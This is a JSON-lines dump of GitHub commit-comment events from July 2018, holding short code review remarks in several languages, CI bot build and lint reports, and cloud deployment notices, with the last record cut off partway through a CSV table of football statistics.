{"id":"7955704233","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29684050,"position":16,"line":16,"path":"kodilla-exception/src/main/java/com/kodilla/exception/test/SearchingFlight.java","commit_id":"280426fed81f8b2cc7d9a7de5d42db3ba5d5733e","created_at":"2018-07-12T11:44:41Z","updated_at":"2018-07-12T11:44:41Z","author_association":"NONE","body":"Oprócz sprawdzania czy na dane lotnisko istnieje jako klucz w mapie, należy sprawdzić czy wartość boolean dla danego lotniska ma wartość true"}},"created_at":"2018-07-12T11:44:41Z"}
{"id":"7955704739","type":"CommitCommentEvent","actor":{"login":"bryanhuntesl"},"repo":{"name":"kzemek/swarm-deadlock-repro"},"payload":{"comment":{"id":29684051,"position":5,"line":5,"path":"docker-compose.yml","commit_id":"0d5feff4578cf417a730579458fc840689d4e762","created_at":"2018-07-12T11:44:49Z","updated_at":"2018-07-12T11:44:49Z","author_association":"NONE","body":"how come it's $$ ? "}},"created_at":"2018-07-12T11:44:49Z"}
{"id":"7955705788","type":"CommitCommentEvent","actor":{"login":"rodrigoxh"},"repo":{"name":"rodrigoxh/projects1"},"payload":{"comment":{"id":29684056,"position":null,"line":null,"path":null,"commit_id":"8476948a5b300de48d58da20a5bcdc32ba238d1b","created_at":"2018-07-12T11:45:04Z","updated_at":"2018-07-12T11:45:04Z","author_association":"OWNER","body":"blbla"}},"created_at":"2018-07-12T11:45:04Z"}
{"id":"7955707340","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29684064,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-12T11:45:24Z","updated_at":"2018-07-12T11:45:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T11:45:24Z"}
{"id":"7955707870","type":"CommitCommentEvent","actor":{"login":"RichyP7"},"repo":{"name":"SharpMap/SharpMap"},"payload":{"comment":{"id":29684065,"position":null,"line":null,"path":null,"commit_id":"597967e0b3fbac963b25118e2bc177f095d81c70","created_at":"2018-07-12T11:45:31Z","updated_at":"2018-07-12T11:45:31Z","author_association":"NONE","body":"Will there be a nuget of the WPF UI package?"}},"created_at":"2018-07-12T11:45:31Z"}
{"id":"7955708562","type":"CommitCommentEvent","actor":{"login":"EdddieN"},"repo":{"name":"EdddieN/machinon-domoticz_theme"},"payload":{"comment":{"id":29684066,"position":null,"line":null,"path":null,"commit_id":"4dea279e80542462e44624f10123965d69ed5e4c","created_at":"2018-07-12T11:45:40Z","updated_at":"2018-07-12T11:45:40Z","author_association":"OWNER","body":"Guys, you are doing a lot of work too. I cannot take the credit alone... can we at least change it to something more like designed by EdddieN, made possible by Domoticz community or even yourselves?\r\n"}},"created_at":"2018-07-12T11:45:40Z"}
{"id":"7955708702","type":"CommitCommentEvent","actor":{"login":"PD3PVO"},"repo":{"name":"PD0DIB/Nextion_HAM-radio-screens"},"payload":{"comment":{"id":29684067,"position":null,"line":null,"path":null,"commit_id":"9c67459f4a0ff1bc496ce52007c1dfb1c2dc1ee7","created_at":"2018-07-12T11:45:41Z","updated_at":"2018-07-12T11:45:41Z","author_association":"NONE","body":"thnx"}},"created_at":"2018-07-12T11:45:41Z"}
{"id":"7955710764","type":"CommitCommentEvent","actor":{"login":"kzemek"},"repo":{"name":"kzemek/swarm-deadlock-repro"},"payload":{"comment":{"id":29684076,"position":5,"line":5,"path":"docker-compose.yml","commit_id":"0d5feff4578cf417a730579458fc840689d4e762","created_at":"2018-07-12T11:46:09Z","updated_at":"2018-07-12T11:46:09Z","author_association":"OWNER","body":"`$` has to be escaped in docker-compose.yml, otherwise docker-compose tries to substitute it"}},"created_at":"2018-07-12T11:46:09Z"}
{"id":"7955711097","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29684078,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-12T11:46:13Z","updated_at":"2018-07-12T11:46:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T11:46:13Z"}
{"id":"7955711672","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29684081,"position":6,"line":2133,"path":"lib/elixir/lib/string.ex","commit_id":"35ac568044aca779d2c000f39cee974cae9cf0c0","created_at":"2018-07-12T11:46:20Z","updated_at":"2018-07-12T11:46:20Z","author_association":"MEMBER","body":"Agreed. I will go with codepoints. We also need to uppercase with Unicode otherwise @eksperimental will be angry at us. :)"}},"created_at":"2018-07-12T11:46:20Z"}
{"id":"7955712527","type":"CommitCommentEvent","actor":{"login":"bryanhuntesl"},"repo":{"name":"kzemek/swarm-deadlock-repro"},"payload":{"comment":{"id":29684083,"position":5,"line":5,"path":"docker-compose.yml","commit_id":"0d5feff4578cf417a730579458fc840689d4e762","created_at":"2018-07-12T11:46:31Z","updated_at":"2018-07-12T11:46:31Z","author_association":"NONE","body":"duh - https://runnable.com/docker/introduction-to-docker-compose - \r\n\r\n>> Compose will look for the shell’s EXTERNAL_PORT environment variable and substitute >> its value. Then, Compose will resolve the port mapping to “8000:5000” before creating >> the web container. You may use either #VARIABLE or ${VARIABLE} syntax in your >>  >> composition. However, you may not use “extended-shell” style features like ${VARIABLE-default} or ${VARIABLE/foo/bar}. If you need a literal dollar sign, you may use $$; you can also use this syntax to prevent Compose from processing environment variables:"}},"created_at":"2018-07-12T11:46:31Z"}
{"id":"7955720290","type":"CommitCommentEvent","actor":{"login":"Shubh-1994"},"repo":{"name":"Shubh-1994/maven-example"},"payload":{"comment":{"id":29684096,"position":2,"line":5,"path":"multi1/src/test/java/artifactory/test/AppTest.java","commit_id":"f1cdf378caad1014b329fd344ea7f6a1ae9a6aef","created_at":"2018-07-12T11:48:16Z","updated_at":"2018-07-12T11:48:16Z","author_association":"OWNER","body":"hiii\r\n"}},"created_at":"2018-07-12T11:48:16Z"}
{"id":"7955720557","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29684099,"position":68,"line":42,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T11:48:20Z","updated_at":"2018-07-12T11:48:20Z","author_association":"OWNER","body":"@xavierlepretre Got it.. Thanks.. I'll make the changes accordingly.\r\n"}},"created_at":"2018-07-12T11:48:20Z"}
{"id":"7955721670","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29684100,"position":28,"line":28,"path":"cap3/3_3_1.sql","commit_id":"fb1a296e5866d16e169037acbe3e4672675f4a52","created_at":"2018-07-12T11:48:35Z","updated_at":"2018-07-12T11:48:35Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\n山本　指摘\r\ninsertを行った後の結果をseletにて確認するようにお願いします。"}},"created_at":"2018-07-12T11:48:35Z"}
{"id":"7955724083","type":"CommitCommentEvent","actor":{"login":"pixelpusher"},"repo":{"name":"pixelpusher/liveprinter"},"payload":{"comment":{"id":29684102,"position":null,"line":null,"path":null,"commit_id":"4a1a5005e3f12a631fca80f88767db5339274b86","created_at":"2018-07-12T11:49:08Z","updated_at":"2018-07-12T11:49:08Z","author_association":"OWNER","body":"also got rid of extra extrusion calculations and interpreter code"}},"created_at":"2018-07-12T11:49:08Z"}
{"id":"7955724283","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29684104,"position":73,"line":44,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T11:49:10Z","updated_at":"2018-07-12T11:49:10Z","author_association":"OWNER","body":"Sure Sir. I am working on it and will share it with you.."}},"created_at":"2018-07-12T11:49:10Z"}
{"id":"7955727634","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29684112,"position":123,"line":72,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-12T11:49:56Z","updated_at":"2018-07-12T11:49:56Z","author_association":"OWNER","body":"Got it.. I'll make it public and Iron out the strategy for next iteration. Thanks again."}},"created_at":"2018-07-12T11:49:56Z"}
{"id":"7955729156","type":"CommitCommentEvent","actor":{"login":"dtzWill"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29684115,"position":null,"line":null,"path":null,"commit_id":"f1a14f98446c0d65152542eb1196c4112cce843a","created_at":"2018-07-12T11:50:16Z","updated_at":"2018-07-12T11:50:16Z","author_association":"CONTRIBUTOR","body":"Why is this better for space?\r\n\r\nOptimized store will deduplicate anyway, right? Will NAR size be reduced or are links dereferenced?\r\n\r\nCopying has potential benefit of avoiding pulling in the full closure of the original package, if all that's needed is a small header or utility.  Not sure how important that is here...."}},"created_at":"2018-07-12T11:50:16Z"}
{"id":"7955735381","type":"CommitCommentEvent","actor":{"login":"fredrikekre"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29684125,"position":null,"line":null,"path":null,"commit_id":"5f191519e57c722c91d5f052d631da3c1cae1726","created_at":"2018-07-12T11:51:37Z","updated_at":"2018-07-12T11:51:37Z","author_association":"CONTRIBUTOR","body":"Please dont ping people in commit messages, or at least edit it out when squashing. Now I'll be notified whenever something happens with this commit. "}},"created_at":"2018-07-12T11:51:37Z"}
{"id":"7955738721","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29684131,"position":20,"line":20,"path":"cap3/3_3_2.sql","commit_id":"cfd18cd4acb4570e618ce4c10045d386e459bf73","created_at":"2018-07-12T11:52:22Z","updated_at":"2018-07-12T11:52:22Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\n山本　指摘\r\n現在月、はハードコーディングより様々なデータに対応するために\r\nDATE_FORMAT関数を使用してください。"}},"created_at":"2018-07-12T11:52:22Z"}
{"id":"7955738744","type":"CommitCommentEvent","actor":{"login":"cak85"},"repo":{"name":"bazwilliams/openhomedevice"},"payload":{"comment":{"id":29684132,"position":null,"line":null,"path":null,"commit_id":"1d927c731e3f301432bb31fba9c072d3ec3a2321","created_at":"2018-07-12T11:52:22Z","updated_at":"2018-07-12T11:52:22Z","author_association":"CONTRIBUTOR","body":"Testis now in Unit Test style. Run \"python setup.py test\""}},"created_at":"2018-07-12T11:52:22Z"}
{"id":"7955741373","type":"CommitCommentEvent","actor":{"login":"hosseindaneshfar"},"repo":{"name":"hosseindaneshfar/testproject"},"payload":{"comment":{"id":29684135,"position":3,"line":3,"path":"index.html","commit_id":"6420f8021caf302abe42c0a0be4c7582779c7d45","created_at":"2018-07-12T11:52:57Z","updated_at":"2018-07-12T11:52:57Z","author_association":"OWNER","body":"Test write Comment"}},"created_at":"2018-07-12T11:52:57Z"}
{"id":"7955742077","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29684136,"position":null,"line":null,"path":null,"commit_id":"5cf9b2c72a73603cc7ecbecdda539c8df03142e4","created_at":"2018-07-12T11:53:08Z","updated_at":"2018-07-12T11:53:08Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T11:53:08Z"}
{"id":"7955743084","type":"CommitCommentEvent","actor":{"login":"he7d3r"},"repo":{"name":"bootcamp-joinville/javascript-katas-part-one"},"payload":{"comment":{"id":29684137,"position":67,"line":65,"path":"README.md","commit_id":"54c3090edb16d12759783c0b82631b3a5bd465bd","created_at":"2018-07-12T11:53:20Z","updated_at":"2018-07-12T11:53:20Z","author_association":"NONE","body":"typo: `otodos s` -> `todos os`"}},"created_at":"2018-07-12T11:53:20Z"}
{"id":"7955745092","type":"CommitCommentEvent","actor":{"login":"restaver"},"repo":{"name":"taniakornilova/py_pong"},"payload":{"comment":{"id":29684138,"position":null,"line":null,"path":null,"commit_id":"3e4e22de99a0b6faa294ef9cdfcc4aee98b49ede","created_at":"2018-07-12T11:53:46Z","updated_at":"2018-07-12T11:53:46Z","author_association":"COLLABORATOR","body":"*Не сервер, а клиент"}},"created_at":"2018-07-12T11:53:46Z"}
{"id":"7955746789","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29684143,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"124a7a858ad2a34d0726c65106ea025c04c091a2","created_at":"2018-07-12T11:54:08Z","updated_at":"2018-07-12T11:54:08Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/urban (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/urban\" in any of:"}},"created_at":"2018-07-12T11:54:08Z"}
{"id":"7955746814","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29684144,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"124a7a858ad2a34d0726c65106ea025c04c091a2","created_at":"2018-07-12T11:54:08Z","updated_at":"2018-07-12T11:54:08Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/urban (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/urban\" in any of:"}},"created_at":"2018-07-12T11:54:08Z"}
{"id":"7955746829","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29684145,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"124a7a858ad2a34d0726c65106ea025c04c091a2","created_at":"2018-07-12T11:54:08Z","updated_at":"2018-07-12T11:54:08Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/urban\" in any of:"}},"created_at":"2018-07-12T11:54:08Z"}
{"id":"7955746859","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29684146,"position":39,"line":null,"path":"pkg/command/urban/urban.go","commit_id":"124a7a858ad2a34d0726c65106ea025c04c091a2","created_at":"2018-07-12T11:54:08Z","updated_at":"2018-07-12T11:54:08Z","author_association":"NONE","body":"golint: exported function NewUrbanCommand should have comment or be unexported"}},"created_at":"2018-07-12T11:54:08Z"}
{"id":"7955751530","type":"CommitCommentEvent","actor":{"login":"summerffly"},"repo":{"name":"summerffly/FA_Auto_X"},"payload":{"comment":{"id":29684151,"position":null,"line":null,"path":null,"commit_id":"c002b02bfb8327a0d080053daa4b9a9f777573ec","created_at":"2018-07-12T11:55:08Z","updated_at":"2018-07-12T11:55:08Z","author_association":"OWNER","body":"Fix: CCMDHandler >>> CCMDRipper"}},"created_at":"2018-07-12T11:55:08Z"}
{"id":"7955758932","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29684166,"position":null,"line":null,"path":null,"commit_id":"8cadf8b6d13760b483056ba8d4df80a7d4472bfa","created_at":"2018-07-12T11:56:46Z","updated_at":"2018-07-12T11:56:46Z","author_association":"NONE","body":"[R/datadocs.R:149:1:](https://github.com/jackwasey/icd/blob/8cadf8b6d13760b483056ba8d4df80a7d4472bfa/R/datadocs.R#L149) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-categorize.R:5:54:](https://github.com/jackwasey/icd/blob/8cadf8b6d13760b483056ba8d4df80a7d4472bfa/tests/testthat/test-categorize.R#L5) *style:* **Commas should always have a space after.**\n```r\n​               nrow(res <- categorize(one_icd10_pt[0,],\n                                                     ^\n```\n[tests/testthat/test-categorize.R:12:54:](https://github.com/jackwasey/icd/blob/8cadf8b6d13760b483056ba8d4df80a7d4472bfa/tests/testthat/test-categorize.R#L12) *style:* **Commas should always have a space after.**\n```r\n​               nrow(rdf <- categorize(one_icd10_pt[0,],\n                                                     ^\n```"}},"created_at":"2018-07-12T11:56:46Z"}
{"id":"7955773913","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29684190,"position":17,"line":17,"path":"cap3/3_4_1.sql","commit_id":"f7d68884d622d47fa8b9f15ee9a2eae50e99d2c6","created_at":"2018-07-12T12:00:03Z","updated_at":"2018-07-12T12:00:03Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\n山本　指摘\r\n「税抜表示」では「0.92」をかけるのはよくないです。\r\n下記を参照してください。\r\nhttps://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q10148625315"}},"created_at":"2018-07-12T12:00:03Z"}
{"id":"7955773989","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29684192,"position":null,"line":null,"path":null,"commit_id":"cd349984e3cbef918c54423f2ef9e79167fc4f92","created_at":"2018-07-12T12:00:04Z","updated_at":"2018-07-12T12:00:04Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180712-120003 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180712-120003\") to [dev](https://console.bluemix.net/apps/e8da2ebd-c11e-4b81-adf3-59731c1ca84f?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-12T12:00:04Z"}
{"id":"7955778200","type":"CommitCommentEvent","actor":{"login":"he7d3r"},"repo":{"name":"bootcamp-joinville/javascript-syllabus"},"payload":{"comment":{"id":29684200,"position":4,"line":7,"path":"CONFIGURACAO.md","commit_id":"62bc3b9c7c9cf7357bffc0cf0c820d19155c075a","created_at":"2018-07-12T12:00:54Z","updated_at":"2018-07-12T12:00:54Z","author_association":"NONE","body":"typo: `[instalação[` -> `[instalação]`"}},"created_at":"2018-07-12T12:00:54Z"}
{"id":"7955779941","type":"CommitCommentEvent","actor":{"login":"mangodevelopments"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29684201,"position":null,"line":null,"path":null,"commit_id":"09d5a637701ec8078fcc04562323e0abf4d781d8","created_at":"2018-07-12T12:01:16Z","updated_at":"2018-07-12T12:01:16Z","author_association":"CONTRIBUTOR","body":"changes made how do i get it evaluated thanks "}},"created_at":"2018-07-12T12:01:16Z"}
{"id":"7955782024","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29684203,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-12T12:01:44Z","updated_at":"2018-07-12T12:01:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T12:01:44Z"}
{"id":"7955786429","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"openthos/oto_system_vold"},"payload":{"comment":{"id":29684214,"position":null,"line":null,"path":null,"commit_id":"7df20f8c1c12bb78f15a9d9905e5dd5a91c66830","created_at":"2018-07-12T12:02:44Z","updated_at":"2018-07-12T12:02:44Z","author_association":"NONE","body":"Sorry but can u explain what it fixes? \r\n"}},"created_at":"2018-07-12T12:02:44Z"}
{"id":"7955786767","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29684215,"position":null,"line":null,"path":null,"commit_id":"dc2213b853312b0a2d4c4a4a67952c6c3da13039","created_at":"2018-07-12T12:02:48Z","updated_at":"2018-07-12T12:02:48Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-120247 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-120247\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T12:02:48Z"}
{"id":"7955787615","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29684220,"position":null,"line":null,"path":null,"commit_id":"82e4f93434f67a118dee10e388f5f0cbd365000e","created_at":"2018-07-12T12:03:00Z","updated_at":"2018-07-12T12:03:00Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2971 of 2972 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 2 tests had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T12:03:00Z"}
{"id":"7955791750","type":"CommitCommentEvent","actor":{"login":"Yashika31"},"repo":{"name":"Yashika31/ExData_Plotting1"},"payload":{"comment":{"id":29684228,"position":null,"line":null,"path":null,"commit_id":"3edfc828f063ecc7c71a99705da11d7018b9829c","created_at":"2018-07-12T12:03:55Z","updated_at":"2018-07-12T12:03:55Z","author_association":"OWNER","body":"This assignment uses data from the UC Irvine Machine Learning Repository, a popular repository for machine learning datasets. In particular, we will be using the “Individual household electric power consumption Data Set” which I have made available on the course web site:\r\n\r\nDataset: Electric power consumption [20Mb] \r\nDescription: Measurements of electric power consumption in one household with a one-minute sampling rate over a period of almost 4 years. Different electrical quantities and some sub-metering values are available."}},"created_at":"2018-07-12T12:03:55Z"}
{"id":"7955792330","type":"CommitCommentEvent","actor":{"login":"xavierba"},"repo":{"name":"xavierba/OpenARC"},"payload":{"comment":{"id":29684229,"position":null,"line":null,"path":null,"commit_id":"3c101cbf504c3f37c6396c8e7c7a8b223c46a784","created_at":"2018-07-12T12:04:04Z","updated_at":"2018-07-12T12:04:04Z","author_association":"OWNER","body":"@mdomsch , you might be interested in this."}},"created_at":"2018-07-12T12:04:04Z"}
{"id":"7955793463","type":"CommitCommentEvent","actor":{"login":"ochawkeye"},"repo":{"name":"BurntSushi/nflgame"},"payload":{"comment":{"id":29684233,"position":null,"line":null,"path":null,"commit_id":"c9747ccb597d6c31f61e4002bc4bd9f45a05b064","created_at":"2018-07-12T12:04:19Z","updated_at":"2018-07-12T12:04:19Z","author_association":"CONTRIBUTOR","body":"While true that this project is not maintained, there is nothing that prohibits it from working...\r\n\r\nRunning your code above produces the following.\r\n```csv\r\nname | id | home | team | pos | defense_ast | defense_ffum | defense_int | defense_sk | defense_tkl | fumbles_lost | fumbles_rcv | fumbles_tot | fumbles_trcv | fumbles_yds | kicking_fga | kicking_fgm | kicking_fgyds | kicking_totpfg | kicking_xpa | kicking_xpb | kicking_xpmade | kicking_xpmissed | kicking_xptot | kickret_avg | kickret_lng | kickret_lngtd | kickret_ret | kickret_tds | passing_att | passing_cmp | passing_ints | passing_tds | passing_twopta | passing_twoptm | passing_yds | punting_avg | punting_i20 | punting_lng | punting_pts | punting_yds | puntret_avg | puntret_lng | puntret_lngtd | puntret_ret | puntret_tds | receiving_lng | receiving_lngtd | receiving_rec | receiving_tds | receiving_twopta | receiving_twoptm | receiving_yds | rushing_att | rushing_lng | rushing_lngtd | rushing_tds | rushing_twopta | rushing_twoptm | rushing_yds\r\n-- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | -- | --\r\nA.Rodgers | 00-0023459 | no | GB | QB |   |   |   |   |   | 0 | 1 | 3 | 1 | 0 |   |   |   |   |   |   |   |   |   |   |   |   |   |   | 501 | 342 | 6 | 45 | 1 | 0 | 4637 |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   | 60 | 129 | 19 | 3 | 0 | 0 | 257\r\nR.Grant | 00-0022984 | no | GB |   |   |   |   |   |   | 1 | 0 | 1 | 0 | 0 |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   | 226 | 80 | 19 | 1 | 0 | 0 | 268 | 134 | 182 | 47 | 2 | 0 | 0 | 559\r\nJ.Kuhn | 00-0022999 | no | GB |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   |   